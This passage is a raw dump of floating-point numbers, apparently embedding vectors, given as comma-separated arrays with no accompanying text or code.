86743,0.02579854,0.0074062184,0.019432934,-0.008396058,-0.014309739,0.020768946,0.020149648,0.031748325,-0.004043664,0.01177374,-0.020860586,0.016840199,0.032703627,0.008400895,-0.03421815,0.0032862802,-0.013015484,-0.0101162195,-0.020670703,0.00037878836,-0.0014767346,0.013187319,-0.005405912,-0.010701892,-0.017468147,0.0077791912,-0.019925997,0.074466825,-0.0027536063,0.026373683,-0.017946651,0.018573781,-0.023607805,0.032185428,0.004778032,0.0035081804,-0.00433696,-0.021846255,-0.029875508,-0.021855462,-0.011261971,0.024866845,0.0056747585,0.010297251,0.025600728,-0.0016454003,0.02581724,0.0047606435,-0.00014638524,0.0024511635,-0.008870977,-0.013706121,0.008472046,0.0054299245,0.0011885576,0.0016177348,-0.014165538,0.005011356,-0.0008134438,0.013286488,0.017437568,-0.0048522274,0.0038870738,0.021116152,0.0012918186,-0.020421855,0.0076163947,-0.008587427,-0.025517935,0.031244766,0.007751829,0.010860498,-0.009723951,-0.018498981,-0.00735607,-0.008891784,-0.019797698,-0.0057019605,-0.012271685,-0.00477012,0.0020853046,-0.026192524,-0.0101819625,0.011310798,-0.001105753,0.008124318,-0.0061087194,-0.0019516901,0.020035597,-0.012586357,-0.0058317687,-0.005336051,-0.022689546,-0.00075151667,-0.01657419,0.023120016,-0.015950998,0.02392447,0.012981504,0.014459868,0.023247503,-0.0022845112,0.029301276,-0.0037563278,-0.010684323,-0.011757091,-0.025916489,-0.0045987247,-0.0012689081,0.019437004,-0.009379428,-0.0065822634,0.014175415,0.00081671117,-0.010533784,0.07320904,0.023321636,0.029760184,-0.0019180477,-0.0017095677,0.005615984,0.0062579443,0.016801767,0.0072073108,-0.009494562,-0.028448485,0.00038107464,0.001089828,0.01096843,0.019987157,-0.023315353,0.004363527,-0.0031512508,0.013609689,-0.017790385,-0.006194125,0.035035037,0.012993605,0.011429633,0.016913053,0.005781943,-0.00328804,-0.007060996,0.022506865,-0.00794012,-0.008312756,0.025357347,0.014306475,-0.003639543,-0.017588235,-0.049837366,0.011927568,0.14119688,0.008878153,-0.012375998,0.023395216,0.0049368776,0.019307187,-0.09644604,0.011981059,0.010745148,0.009509415,-0.008228832,-0.009723876,-0.0017382546,0.022706786,0.009815759,0.003862241,-0.016863685,0.0016404183,0.014574465,-0.015458095,0.00097595,0.0033876318,0.00948412,-0.016306873,-0.01500886,-0.015992522,-0.0035451811,-0.014299836,-0.00948237,-0.021928176,0.0053158365,-0.0041191787,0.00623367,-0.014917918,-0.022759872,0.00309225,0.029899508,0.007908355,-0.0031266282,0.015808932,0.0039539225,-0.010878353,-0.037675917,-0.036836594,-0.12704183,0.006246156,-0.02287035,-0.058789346,-0.00352526,-0.007127064,-0.008258242,0.011494533,0.025810376,0.013987937,0.011123502,0.007962176,0.0013210458,0.007690676,-0.017656742,-0.00735218,0.003925974,0.005369887,-0.0009242034,0.015551419,0.011208924,-0.010911732,-0.009495081,-0.024369104,-0.024992617,0.012912632,0.011952314,0.03625847,-0.0046241092,0.016482266,-0.010808382,0.025050854,-0.018184064,0.01564547,-0.004359864,-0.039055835,-0.020988801,-0.004079436,-0.0025295424,0.01660439,-0.014511034,0.0046829106,-0.004196729,-0.019868094,-0.021413945,0.007657884,0.03169029,0.008499125,0.020696701,0.007731977,0.024854038,0.025210239,-0.020173553,0.016550563,-0.0004547841,-0.008839982,0.013301003,-0.016599543,0.0015036089,0.023933863,0.005627701,-0.020369256,-0.005089943,-0.0042067436,0.022807227,0.004385296,0.0071552796,-0.02193393,-0.006297468,0.034752194,-0.024656316,0.016955636,0.0035914783,-0.03851473,0.02323537,0.01774876,0.005762495,-0.010914186,0.012740764,-0.008789341,-0.013058821,-0.021675136,-0.0051496476,-0.02155146,-0.004143313,-0.016556794,-0.015255838,0.0071591996,-0.017411338,-0.0016626582,0.009446162,-0.0088988105,0.0076854327,-0.011007449,0.011785158,0.010397573,0.03855032,-0.0043629943,-0.03246814,-0.012442228,0.008196607,-0.03139589,-0.0034336208,0.0074805715,-0.0093852645,0.0070703374,0.005781388,-0.013250713,-0.014502314,-0.0047368654,0.011103963,-0.014757746,0.02494503,0.000998253,-0.02924983,-0.0070928433,0.0060850317,0.0031134859,0.021328747,0.0017902559,-0.043477632,0.0023521301,0.013193696,0.02195454,0.04080848,0.008692969,-0.034240607,-0.0042675636,-0.0061287084,-0.0044705947,-0.026160784,0.031219877,-0.0099190585,0.0070613218,-0.016400516,0.001105579,-0.015912494,0.0038630094,-0.036606003,-0.0062229815,-0.010571343,-0.0025145935,-0.0056323195,0.0030720646,0.00052273786,-0.02864865,0.031874973,-0.021545524,0.03754976,0.017575432,0.0057996972,0.021266239,-0.02409838,-0.018281164,-0.00802645,0.06483182,-0.0023181285,0.011761568,0.031841815,-0.002323295,0.026876513,0.031356893,-0.03147426,-0.04009962,-0.01390116,-0.02951712,-0.0006656676,-0.010608694,0.0040621287,-0.021563698,0.024978995,0.019797724,0.008165654,-0.011554343,-0.008585756,0.015758758,0.009300175,0.0009189545,0.012364402,0.010829479,0.011035216,0.014841553,0.0013078672,0.0077511584,-0.0010054632,0.0045922915,-0.0069805775,-0.017569507,-0.0046524554,0.0024436314,-0.03917469,0.0044568637,-0.004751607,-0.009146836,-0.011120709,0.0058339466,-0.0012890805,-0.0026127382,-0.02268801,-0.0006600797,-0.027218789,-0.00665134,-0.0003401615,0.012370275,-0.013642656,0.0042920914,0.0077133593,0.0023859292,-0.0022453212,0.0166931,-0.013488823,-0.0050656754,-0.013713925,-0.023738747,-0.01920427,0.011519657,-0.012893725,-0.02854101,-0.01096665,-0.012334036,0.015872743,-0.009516707,-0.0037938114,0.0077700624,0.031891722,-0.007160469,0.001268596,-0.026442524,0.010150451,0.003696195,-0.0053555104,-0.00901086,-0.011418767,0.008376194,0.020609057,0.005106909,0.008264627,-0.0041402928,-0.00094173464,-0.012013409,-0.030856956,-0.008894728,0.04056809,-0.025474107,0.0037671183,-0.008872365,-0.0011264737,-0.010225338,-0.0011858738,0.010263026,0.0016949817,0.028568733,0.0009526996,0.028835677,0.0064436756,0.004928337,0.0020456822,0.0017482268,-0.0063381772,-0.00031005486,-0.02689244,-0.006603057,0.021494452,0.004915242,-0.015813086,0.015673673,-0.01245696,0.01216784,-0.0015171341,-0.0047217696,0.036878962,-0.015356408,0.005796238,0.0345622,0.0068263547,-0.013772832,-0.009672998,0.007238075,-0.016911488,0.024158206,-0.014029766,0.0023852575,-0.00322061,-0.015698522,0.023270922,0.023490202,0.022364657,0.006744851,-0.004538218,-0.011853339,-0.010489173,0.012728536,0.015655888,-0.0082603935,0.01737138,-0.037447505,-0.02524154,-0.0019211489,-0.0033029446,0.006399593,0.004517092,-0.0005753601,-0.0047548003,-0.018101256,0.0044249534,-0.025602268,0.013077534,-0.010181022,0.003220638,0.006653341,0.008071057,-0.016519722,-0.011477134,-0.015457572,-0.014260464,0.015349297,0.036847036,0.010013865,0.00014606772,-0.008447639,0.016659144,0.02642487,-0.009213864,-0.0065732417,0.0009572322,-0.010079749,-0.01595412,0.014788042,-0.004743873,-0.013386956,-0.005651432,-0.0011680496,0.003083973,-0.014708258,-0.00045864107,0.01266725,0.024275787,-0.015511867,-0.011802416,0.005336802,0.0033997495,-0.0038682187,0.0343373,-0.016655311,-0.0035638874,0.005831281,-0.006790664,-0.0028832718,0.005280157,-0.035954528,-0.0047431733,0.010266168,-0.0095303245,0.0024058423,-0.0023527055,0.000009841363,0.009862451,0.008001001,-0.031152062,0.0027708772,-0.0129335895,-0.0028405031,-0.010521095,-0.011533501,0.0019929016,-0.00767306,-0.008271173,-0.00078798446,-0.004279194,-0.021585332,-0.011470695,0.00083646004,0.021748437,-0.005546277,-0.03090308,-0.024175072,-0.00052618084,-0.0050342134,-0.006857819,-0.004402021,-0.0036851163,-0.019039538,0.062950164,-0.020241275,-0.017604776,-0.022102458,0.04925415,0.00531197,0.0011856856,-0.014923944,-0.031279713,-0.016041106,-0.012795895,-0.03742625,0.018806925,0.022056071,-0.025614446,-0.025581265,0.007824988,0.011447978,-0.0042609284,0.0097744465,0.019845162,-0.009034523,0.010176151,-0.01768979,-0.014299192,-0.06510802,-0.008776738,0.010952834,-0.033693247,0.003330432,0.007614786,0.0016024524,-0.025913307,0.0028141795,-0.018350841,-0.021764997,0.01700894,-0.0069731153,-0.0025460965,0.023302754,0.0243413,0.0027847292,-0.001884829,-0.0036680032,0.0076655983,-0.018411549,-0.015518783,-0.017525429,-0.013039706,0.020932205,-0.0048495783,0.0066351136,0.014767245,0.0086242715,-0.02903765,-0.011758697,0.008482898,-0.0022733712,-0.026924385,0.0138590345,0.006985962,0.0033068662,-0.013589634,-0.0007044066,0.016797777,0.011648521,-0.01166544,-0.016672157,-0.016784249,-0.007753578,-0.02548478,0.021517497,-0.009643797,0.00438588,0.011569835,-0.0025795633,0.0039423136,0.0100568775,-0.000442358,0.035015233,-0.0023048643,0.001082263,0.0010565483,-0.015199244,0.004468097,0.013706808,-0.006821194,0.020282237,-0.008260583,0.027230375,0.041793514,0.005702476,0.0034712863,-0.012581032,0.0037668084,-0.0063240067,-0.008308036,-0.022394236,0.010625261,-0.014589294,-0.027860405,-0.007803548,-0.009224462,0.0067298044,-0.027832104,-0.023489352,-0.10039148,0.005771281,-0.0069803395,-0.013297715,-0.022460325,-0.011265903,0.008564042,0.011385298,0.0053408383,-0.036854126,-0.011226125,0.01463392,0.016622562,0.013912776,-0.0009368535,-0.0005236744,-0.026187936,0.011806488,-0.0018306952,0.025449907,0.013977943,-0.011930931,-0.0052878773,-0.0068040416,0.013300449,0.00054582895,0.0038474528,0.030681599,0.0031910343,-0.007507844,-0.011778358,-0.00584412,0.0076499293,0.016791012,-0.0093473615,-0.012924436,-0.0009526164,0.017762292,0.007371361,0.012356437,-0.010377816,-0.014373824,0.009971574,0.01544935,0.005052267,-0.00795522,-0.0010020809,0.024462614,0.03625478,0.015108842,-0.004329061,0.01667596,0.009240323,-0.0017733326,0.0073355893,-0.024467537,0.008928177,0.00430933,0.00031819672,-0.00035073727,-0.021284413,-0.0022371756,0.007081052,-0.00710716,0.024974205,0.01669346,-0.007530787,-0.0097996695,-0.023238646,-0.014736852,0.009778469,-0.009276903,0.004507566,0.0017921026,0.00048376873,0.010211752,0.0056112884,-0.010598227,-0.021268807,0.009173015,-0.017600916,-0.018325342,0.0035385396,0.010426955,-0.0074607576,-0.008792837,0.0025850285,0.017017892,-0.0066852537,0.010777731,0.010282315,-0.004162167,-0.0022530204,-0.008953265,-0.010076454,0.011454656,-0.008412812,0.007927536,-0.013688848,-0.0059490665,0.003510974,0.0064031766,-0.01577531,-0.00933405,-0.13816114,-0.013145904,0.016518628,-0.027504243,0.0021902067,-0.009304899,0.018239966,-0.003497794,0.05787356,0.013747989,-0.007382363,0.0396877,-0.02331445,0.008499618,-0.0133495685,0.0054349685,-0.04032852,0.011880198,-0.0049200295,-0.0036482753,0.006337422,0.008973139,0.020415159,-0.0067061707,0.0033869823,0.023843959,0.00013966809,0.0054283454,0.01916966,-0.01209825,-0.0011299336,-0.008968766,-0.001949487,-0.0007114114,-0.059866585,-0.0043676905,0.013318575,-0.01982974,-0.005925232,0.016577773,-0.013933565,0.009843284,0.024573764,0.006342471,0.0051205605,0.008066285,-0.021773828,0.025254576,-0.029283077,-0.02722923,0.018841486,0.02070807,0.019942135,0.0094498815,0.0042504272,-0.022377726,-0.008020541,0.01172776,0.010834255,0.016617846,0.008846841,0.012992958,-0.008167925,0.010785355,-0.014604863,0.008732933,0.0025956861,0.010282093,-0.0061931824,0.030337317,0.005822437,0.025383232,0.02094347,-0.028257694,0.019033683,0.015850037,0.008781162,0.029427074,0.009740882,0.011752093,-0.0060141315,-0.019780464,0.014298877,0.0032789763,-0.03314296,0.0073642074,0.008292278,-0.00029700677,-0.013887911,-0.014202663,-0.002880749,0.022294397,-0.0047231023,0.033109955,0.018537123,0.014118898,0.049588703,-0.008354482,-0.014150022,-0.005655106,-0.007959697,0.006374954,-0.0148560535,0.002951998,-0.014656527,0.033200886,0.016186474,0.01447826,0.011521851,0.00807982,-0.019008446,0.025639012,-0.019392187,0.019243343,0.009056432,0.01870845,-0.008498168,-0.002055359,-0.008399393,-0.0050208927,0.0015646629,0.009742536,0.0165575,-0.0001616805,0.008203529,-0.019049266,0.004959136,0.006864123,-0.0037455081,-0.032628123,-0.0035789337,0.006943863,0.0035848187,-0.0022133018,0.014757608,0.017524133,-0.014161745,0.0031031845,0.003493243,0.007305163,0.0029498113,-0.0027496824,0.015371154,0.0013046913,0.0056898883,-0.00045149113,-0.0028119383,-0.007982171,0.0020468943,0.0110753765,0.005864647,-0.03153635,0.02373198,0.019463228,0.010137092,0.0054615717,-0.009875148,-0.008579855,0.00860246,0.019847915,-0.009824936,0.010780186,0.045905437,-0.010356594,0.014099259,0.0018889216,0.0043133874,0.0035361017,-0.0015113781,0.008159747,-0.005816055,0.006891448,0.004722614,-0.04461951,0.011444989,0.026251597,0.01187376,0.005053825,0.043517612,0.016551038,-0.035113476,-0.00016233996,-0.004089906,-0.0055632363,-0.008902219,0.018235467,-0.0035913591,0.0044103414,-0.0052804677,-0.0077931494,0.05414063,0.0084264325,0.0028060412,-0.023714501,0.025448231,-0.005098461,0.0066454327,0.01246904,0.0046883593,0.014300839,-0.026627269,0.007545175,0.0217036,-0.006364601,0.020864764,0.004368393,0.0023244636,0.023860428,0.007072936,-0.014389145,-0.01882698,0.007827422,-0.0049599023,-0.012843207,0.014595872,0.01796686,-0.005803516,-0.0335822,0.004772695,0.01269676,-0.002323384,-0.01549228,0.010469222,-0.0023064201,-0.017263982,0.027173031,0.028149117,0.012264201,-0.035203498,-0.00884876,-0.0024122111,0.0072801667,-0.024112968,-0.00590809,-0.0030184325,0.00045313314,-0.018706776,0.008127846,0.0011009882,-0.0026241026,0.038525466,0.02060103,0.02946495,0.017719584,0.01789191,-0.006098825,0.0030279814,-0.012351433,0.014286216,0.040526196,0.011930195,-0.018359583,-0.0022635076,0.014319288,0.012435558,-0.007485011,-0.0143462345,0.0019380802,0.0006802403,0.0056995545,-0.0029123218,-0.0044135796,-0.019422371,-0.022549134,0.0040275715,0.00490521,-0.015662106,-0.02002746,-0.00300887,0.013853752,0.002888123,0.010453596,-0.009434169,0.017409185,-0.0120048355,-0.0045639174,-0.007375852,0.012838931,0.021966305,0.0026978047,-0.00019043553,-0.02281789,-0.0009280191,0.0015060556,-0.0064501557,0.026351158,0.012760173,0.0009153676,-0.004696339,-0.012602755,0.008584389,-0.0011617269,-0.0033281152,-0.018612416,-0.005546049,0.025294485,0.008199594,0.0076897615,-0.005554642,0.01361099,0.018593276,0.0030596475,0.0003186326,-0.014786755,-0.00038849973,-0.004034137,-0.0051789796,0.017106386,0.0013756185,0.0009041405,-0.01314102,-0.006336342,0.0032235447,0.016263219,0.000721751,-0.012113676,-0.011304481,-0.0065496606,-0.030505404,-0.029254075,-0.008035094,-0.013085161,0.00973603,-0.0053489623,0.0058373436,-0.005191155,0.021735666,0.024048263,-0.02009817,-0.008049863,0.023636278,-0.0071348674,0.0066728173,-0.022117263,0.03064608,0.005067164,0.020765787,0.030409293,-0.013359907,0.010851383,0.0012189487,0.0026136425,0.010169304,-0.010546514,-0.010440414,0.016095396,-0.01419129,0.0033660508,0.006064075,0.00865175,-0.007131118,0.006573042,0.013600458,-0.014069115,-0.024361799,0.039203063,-0.022121228,-0.012023925,0.0017121342,0.0049193627,-0.010637969,0.0036407602,-0.008695627,-0.030031377,-0.0039300793,-0.0047971304,-0.021397311,-0.00036846093,-0.016537167,0.016474655,-0.009842418,0.03132328,-0.012611147,-0.023277735,-0.003938237,-0.11103932,-0.01225265,0.021947106,0.012077354,0.046182044,0.007862685,0.0012375134,-0.0045199636,-0.00528691,0.022697113,0.014223881,-0.0151062505,-0.004730319,0.01648383,0.027594738,0.0028333124,-0.0089291325,-0.0021167565,0.009957273,-0.022833778,0.012837312,0.012715691,-0.0034274817,0.0009300379,-0.0060017174,0.0018327469,-0.009841639,-0.0058628577,-0.0043759686,-0.0067595486,0.0061838212,0.0043787924,0.0053972225,-0.024115542,-0.030385934,0.021368057,-0.006695411,0.0140939215,-0.021748452,-0.026105277,-0.0077837943,0.0054678856,-0.003991825,-0.0005414451,-0.039196473,0.01939578,-0.028794538,0.00464995,-0.000811882,0.0053120703,0.0069248574,0.029899975,0.03101108,0.023739314,0.0055916742,0.009719533,-0.00021511181,-0.0030405212,0.027857333,0.0008165366,-0.0063318834,0.010156157,0.0162074,-0.013507363,-0.015961561,-0.00060854544,-0.0025707036,0.02543583,0.0069498597,0.0130227655,-0.009652388,0.005408856,-0.009021922,-0.001820653,-0.016724214,0.0063356995,0.016060006,-0.0066423323,-0.030605057,0.00672123,0.061676066,0.0009037959,0.0119306,0.0084042335,0.010129382,0.0036519605,0.008731334,0.008898187,0.027776917,-0.0042462656,-0.004964652,-0.0091777155,0.03327321,0.0019619928,0.008878838,0.025317257,0.016730128,0.0016783132,0.0031809215,-0.0073438613,0.001529002,0.012886969,-0.004730081,-0.013342895,-0.008059045,0.002154298,0.00037196995,-0.005231631,0.006844916,0.004505634,-0.004935531,0.017412612,0.031962547,0.020379724,0.019306095,0.028893793,0.008680402,0.0036000952,0.001655284,-0.019463575,-0.0015882887,-0.018538617,-0.0009312209,0.024472764,0.035190117,-0.02327917,0.01341476,-0.0036307725,-0.017838478,0.02434155,0.0073693357,0.004805063,0.010758438,0.0042284024,-0.0075834733,0.005781785,-0.009738207,0.0070375986,0.0000485427,0.019591736,-0.014780685,-0.023261202,0.0074261315,0.0005966619,-0.017812787,0.016622696,-0.013726773,0.010906287,-0.00037328,-0.012196753,-0.0131963445,0.000101634025,-0.010386946,0.016282206,-0.013060842,-0.0046955985,-0.003284756,-0.005575455,-0.04218503,-0.014373024,0.002867425,-0.001580335,0.005149088,0.009164126,-0.019742656,-0.0039342293,0.007297306,0.0026186472,-0.013836544,0.0029206756,-0.023738751,-0.013216202,0.00120726,-0.0052027404,-0.019572258,0.0017563255,0.037052613,0.04788533,-0.0015030676,-0.014086642,-0.021022601,-0.014289866,-0.013516848,-0.03884942,-0.01218966,-0.018337008,0.019017369,-0.00916936,0.016342157,-0.003447402,-0.013212926,-0.017682374,0.00089505606,-0.010342385,0.01257478,-0.014348221,0.015406594,0.023663852,-0.016123012,0.0067213536,0.006816401,0.00747207,-0.013926126,0.015298444,0.037960883,0.012065858,-0.0069282865,0.02080125,-0.015509337,-0.02378552,-0.015634658,0.022549875,-0.00034398827,0.12485811,0.015007194,-0.021466255,0.0034042632,0.02044541,0.007821904,0.009712483,-0.0024861568,-0.004648495,0.018997533,0.018117629,0.0025165887,0.0073935664,-0.004411164,-0.0019129481,0.036884114,-0.0061032027,-0.018226042,0.010006788,0.011367823,0.028347353,-0.005998793,-0.02304618,-0.047726214,-0.014899088,-0.053011417,0.02520135,0.0272527,0.002755148,0.034303814,0.020423142,-0.001718371,-0.012641384,0.0036958924,-0.011148755,-0.0018212761,0.00020562205,-0.016402181,0.0027603698,-0.019451635,0.0043860544,-0.009715898,0.000101146725,-0.013292275,-0.013783529,-0.024852337,-0.02587992,-0.020892603,0.003003565,0.0004242652,-0.0020770382,-0.0056748195,-0.004276227,0.008746165,0.028796533,0.008376099,-0.0046565253,-0.0105974255,0.01631128,-0.021258999,-0.006661403,0.013599245,0.01765626,-0.006508536,0.025773227,0.0055763293,-0.021151999,0.012019555,-0.0013264877,-0.017543536,0.030871442,-0.025808603,0.013822161,-0.004833252,-0.0063139056,0.012237264,-0.009202181,-0.0015362318,-0.007889852,0.009914488,0.0022679877,0.021341741,0.004394267,0.0012613612,-0.009172302,-0.023729982,-0.030967582,0.02331992,0.00081578107,-0.016626867,-0.03063278,0.038448796,0.031370357,0.02622765,-0.0036293801,0.013064943,0.030902153,-0.029158713,-0.0082453685,0.006404936,-0.0146257235,-0.017724233,0.011057428,0.0010024711,-0.006477525,-0.0058363457,0.019005388,0.009350758,-0.0134720765,-0.0004195714,0.0013157313,0.02723664,-0.006762376,-0.0046331324,-0.0017208555,0.025343264,-0.0451897,-0.021830883,-0.0012151477,-0.029971039,0.01095715,0.0027561125,0.0041310606,0.023178762,-0.0030046625,-0.012529975,-0.012119461,-0.023956908,-0.023853892,0.0103516355,0.021980116,-0.024909645,0.012702309,0.013062687,0.0002442015,-0.009588632,0.035169713,0.0058980496,0.023130678,-0.016813707,0.009763308,-0.0031092314,-0.0018715789,0.008993791,0.0019856924,-0.028220935,0.03554242,-0.019344078,0.014007477,0.008701318,0.01143144,0.014140194,-0.0073335012,0.007754541,0.01758034,-0.0097005535,-0.008831059,0.007499917,0.00840112,0.0030236838,0.02555887,-0.0013738751,0.008526232,-0.05329407,0.03546777,0.0076171216,0.0009746841,-0.014065395,-0.0046987375,-0.012502718,-0.0045509823,-0.019550467,0.017647067,-0.017931303,-0.0046759793,0.0078012175,0.00018979507,0.017803952,-0.011791335,-0.0046681296,0.024241297,0.0027112907,-0.012700551,-0.0041911686,0.009456869,0.0018919441,0.018615026,-0.014503344,-0.01887203,0.020412177,0.0041692294,-0.0016601494,-0.0063836602,0.0017809559,-0.00094642,0.021125255,-0.025423137,0.019859964,-0.024851426,-0.027555322,0.007714647,0.0024785174,0.027128814,-0.013479129,0.025505645,-0.005532512,-0.0042017465,0.019215075,0.014902582,-0.014733035,0.022852035,-0.013714948,-0.014404604,-0.028557835,-0.00008171349,0.0006443511,0.0152723985,-0.019800117,-0.0048193107,0.0072641214,-0.00018336491,-0.015843501,-0.008898272,0.00628776,0.0054607345,0.01390091,0.0028864155,-0.014947406,0.012681209,-0.02840914,-0.024581382,-0.0021128168,0.008840438,-0.0052448995,-0.0057526296,-0.0063592223,0.031256158,0.01398601,0.008285661,-0.009800923,-0.011374294,0.018452944,0.031725865,0.007911426,-0.014266654,-0.014341781,-0.016146295,-0.0049226554,0.0148748355,-0.014423159,-0.026965052,0.0025394978,-0.004665294,-0.015707267,-0.012650728,-0.025049828,-0.018055515,0.019310998,0.007217649,-0.0113293305,0.008948954,0.010808944,0.0065314425,0.016987802,-0.007895938,-0.003992546,0.012776086,-0.02104193,0.006168599,0.019945651,-0.0040157773,0.01488128,-0.015446759,0.029990202,0.006443333,-0.014214902,-0.0040420177,-0.006188242,0.005380073,0.0060360143,0.016089799,-0.023066776,0.0045304704,-0.002614487,0.00074460095,0.009075504,-0.005872445,0.041068107,0.06258414,-0.053198006,-0.023248952,0.011736163,0.014509662,-0.017030703,0.023599423,-0.0001798234,-0.022575583,-0.022954268,0.0065863356,-0.0027887549,0.0039402563,-0.04188073,-0.0060730465,0.008113766,-0.006511131,-0.0010244986,0.00643651,-0.00996618,-0.021385496,0.024272947,-0.018909145,-0.004309233,0.0045785373,0.0044512125,-0.0024798524,-0.0045133685,0.0057998565,0.0005926242,0.009279638,0.0062143942,0.004429502,-0.0073244316,0.016302247,0.0022636799,-0.0056559094,0.015628586,0.007858488,-0.0031637184,-0.03421963,0.0040793843,0.0029995462,-0.0030876515,-0.0035925985,-0.010028431,0.0032384729,0.020865608,-0.006138133,0.13303189,-0.023237089,0.013126755,-0.0013215336,-0.003948388,-0.010455522,0.012571542,0.034545127,0.0023994546,0.0145901,0.023398958,-0.004830173,-0.01244835,0.019836182,-0.00283516,-0.009304103,0.0015942265,0.13378806,-0.010606974,-0.0059891,0.019279107,0.017841093,0.01706109,0.010044167,-0.007741863,-0.075550385,0.0016188024,-0.052321363,-0.005685783,-0.0060934094,-0.025738155,0.007924205,0.008791324,-0.0044742906,-0.0068050427,-0.0035264674,0.00669523,0.0068491595,-0.019943979,-0.017296998,0.0010033958,0.003931429,-0.0075695296,0.008710979,-0.024212446,0.03236167,-0.037729364,0.0027806198,0.02864443,0.017768737,-0.009360584,-0.013389354,0.016105527,-0.014489858,0.01480991,0.0008012326,-0.0026355349,-0.0030096064,-0.021165892,-0.007999096,0.009168717,0.003452202,0.02790672,0.014598623,-0.015760383,-0.024025701,-0.022655942,-0.019721922,0.00094452396,0.0030821576,0.01117448,0.033608437,-0.019369256,0.013878965,0.013274275,0.02063241,-0.0014457195,0.016065512,0.01840112,-0.009638009,0.03095417,-0.011609526,-0.00918855,0.015630929,0.036190774,-0.0030084958,0.00041852696,0.0056123044,0.014474053,0.0043545864,-0.002049581,0.0034808088,-0.008214131,0.016449733,0.003566029,0.015694406,0.0017434245,-0.0066516073,-0.0011192037,-0.02734672,-0.018794049,0.018115034,-0.010319287,-0.0037155722,-0.0051568476,0.00447316,-0.00063257414,-0.029441787,-0.005107363,0.012528382,-0.0033123493,-0.005383019,-0.012053255,0.019908031,0.0024906443,-0.004726545,-0.0054371147,-0.007381913,-0.018561166,0.0013958755,-0.008681571,0.00050705567,-0.0009171363,0.0045763315,-0.033639733,-0.0029166248,0.010833931,0.005030493,-0.006578904,0.010564866,-0.01305427,0.011616886,0.010147248,0.035534594,0.007050734,-0.021146988,0.0151761705,-0.019741064,-0.016879005,0.0061834543,-0.005839604,0.0061809923,0.0074481512,0.010755611,0.0081310915,0.00001585844,0.008561917,-0.009185915],[-0.0031595451,0.013742101,-0.015576868,-0.002268434,0.005505798,-0.0082254335,0.009110113,0.043857947,-0.020197304,-0.022119617,0.030535216,0.0075812065,0.0024293798,-0.0106175365,-0.010175799,0.015094627,0.0034257495,-0.005016452,-0.011676703,-0.0052381684,0.019154388,-0.0016456111,0.006601271,0.014515771,0.033348378,-0.00024568013,-0.0127322925,-0.0040840353,-0.0056859506,0.010517286,0.0076973713,0.009752659,0.026600754,0.012659846,0.019318068,-0.033838265,-0.0035430233,-0.016717186,0.01075521,-0.012419616,-0.0024974626,0.009249102,0.014179504,0.0021155134,-0.024180196,-0.0072543146,-0.012982593,0.013926019,-0.02826577,0.0038814207,0.03110422,-0.008468389,-0.009794096,-0.0055818786,0.00817328,-0.011036904,-0.002448934,-0.0031300536,0.0057440894,-0.027649898,-0.016151132,0.021824302,-0.02569236,-0.009716452,0.0029655276,0.0033290836,-0.012296689,-0.0008279466,-0.00065896206,-0.013214081,0.003991575,0.0051809233,0.011907505,-0.0023466279,0.018273994,0.011141328,0.014381728,-0.011786986,-0.0006266457,0.017265042,-0.015241533,0.01568499,0.012749233,0.007215399,-0.011002741,0.008047138,-0.009837691,0.008631291,-0.025430694,-0.022985023,-0.024811406,0.002982008,0.0008352867,0.026113495,-0.03536267,0.015791921,0.010356124,0.007815745,0.0178513,0.008125373,-0.009110709,-0.026064942,-0.008058272,0.007605954,0.024115361,0.00039510176,-0.012593599,-0.033064567,-0.011893328,-0.033820424,0.0016315659,-0.002398667,0.007291125,0.0053068274,-0.020132542,0.011300543,0.011011661,0.0040491614,-0.023530629,0.012847036,-0.011576747,0.017820472,0.05902085,-0.018945554,-0.011550971,-0.0042075124,-0.01678318,0.028355215,-0.004909147,0.007160376,0.0015887124,-0.009411606,-0.010803641,-0.01156753,-0.0091089755,-0.011108212,-0.0005032658,-0.0064542596,-0.0025496082,-0.005681436,0.009569394,-0.009895846,-0.01088743,-0.01924941,0.013133112,0.016968977,-0.0120794065,0.040825147,0.0032091374,-0.008309813,-0.0050595575,0.015685769,-0.008376518,-0.021029873,-0.014220518,0.03072881,0.011247733,-0.013491243,-0.032688666,-0.001904957,-0.014387971,0.009400013,0.025040226,-0.010874409,-0.0016893584,0.0052883397,-0.0088809095,0.0013475175,-0.014640369,0.015448881,0.0013585445,0.013347463,0.005522675,0.0063604116,0.015789269,0.0343352,-0.000546871,0.011203983,0.017210163,-0.019064976,0.020244053,0.0037028773,0.014548448,0.010386411,-0.0005766134,0.024790062,0.007636093,-0.03306694,-0.009634849,-0.0042699752,-0.0060744793,-0.026943594,0.011887484,0.025090994,-0.016366147,-0.020854011,-0.008104329,0.090085715,-0.009721533,0.022408856,0.00024277122,-0.0015136342,0.015829314,-0.01293942,-0.012446245,0.0044440334,-0.012692038,0.022330906,0.0055568977,-0.018505773,0.013212009,-0.013103362,0.004243139,0.013394391,0.0034486793,-0.051323615,0.006568206,0.014326083,0.021412658,-0.014403998,-0.012262593,0.01495439,-0.018577036,-0.016923098,0.0143920155,0.0060497574,0.0063487003,-0.01634995,-0.0018072316,-0.010077401,-0.00288604,-0.0017238831,0.024502922,-0.019110499,-0.016403431,-0.009270722,-0.013910602,0.012861711,-0.010557819,-0.0019391008,0.011678513,0.006709271,0.03152653,0.03980721,0.0032501032,0.0040118163,-0.0056597968,-0.008753636,-0.007443835,0.010610158,0.0018407787,-0.020899832,0.025350986,0.016678018,0.0085478,-0.009806343,-0.0125668,-0.01893363,-0.013775803,0.0052526575,0.008802015,0.0048975954,-0.004761471,0.029691435,0.018552229,0.0030454213,0.027579121,-0.026292728,-0.024521051,-0.026626574,0.010407794,-0.024164163,-0.021787984,-0.004442405,0.022702409,-0.0077856397,-0.0050781877,-0.006730678,0.014324307,-0.017461948,0.0057533938,-0.009799398,-0.016663402,-0.0022698613,-0.019493155,0.012616071,-0.034226555,-0.0031747425,0.031549547,-0.020485997,-0.0044850856,0.00511434,0.042453673,-0.016246509,-0.015503807,0.0033766923,-0.0005254014,0.0050267205,0.0071848175,-0.017010042,0.0036279971,0.004821423,0.017510174,-0.012930722,0.0031204524,-0.010699367,0.0020481967,0.04408294,-0.022479642,0.029639347,-0.024299242,-0.021517321,-0.03811888,0.0063081486,0.011388309,0.0021203477,-0.0013627803,-0.012320705,-0.010351893,0.0022313995,0.012204603,-0.014636861,0.02302799,-0.011896528,-0.030680167,0.019503945,0.01764121,0.002941529,0.007620109,0.005733615,-0.015741773,0.0032526539,0.015619026,0.011555807,-0.004028333,0.027683211,0.0041899793,0.013361109,0.0064347708,-0.01517493,-0.029220192,-0.032194514,-0.013219769,0.016117968,-0.007983142,0.0065773325,0.0022007998,0.020561265,0.00495478,0.020122102,0.010265803,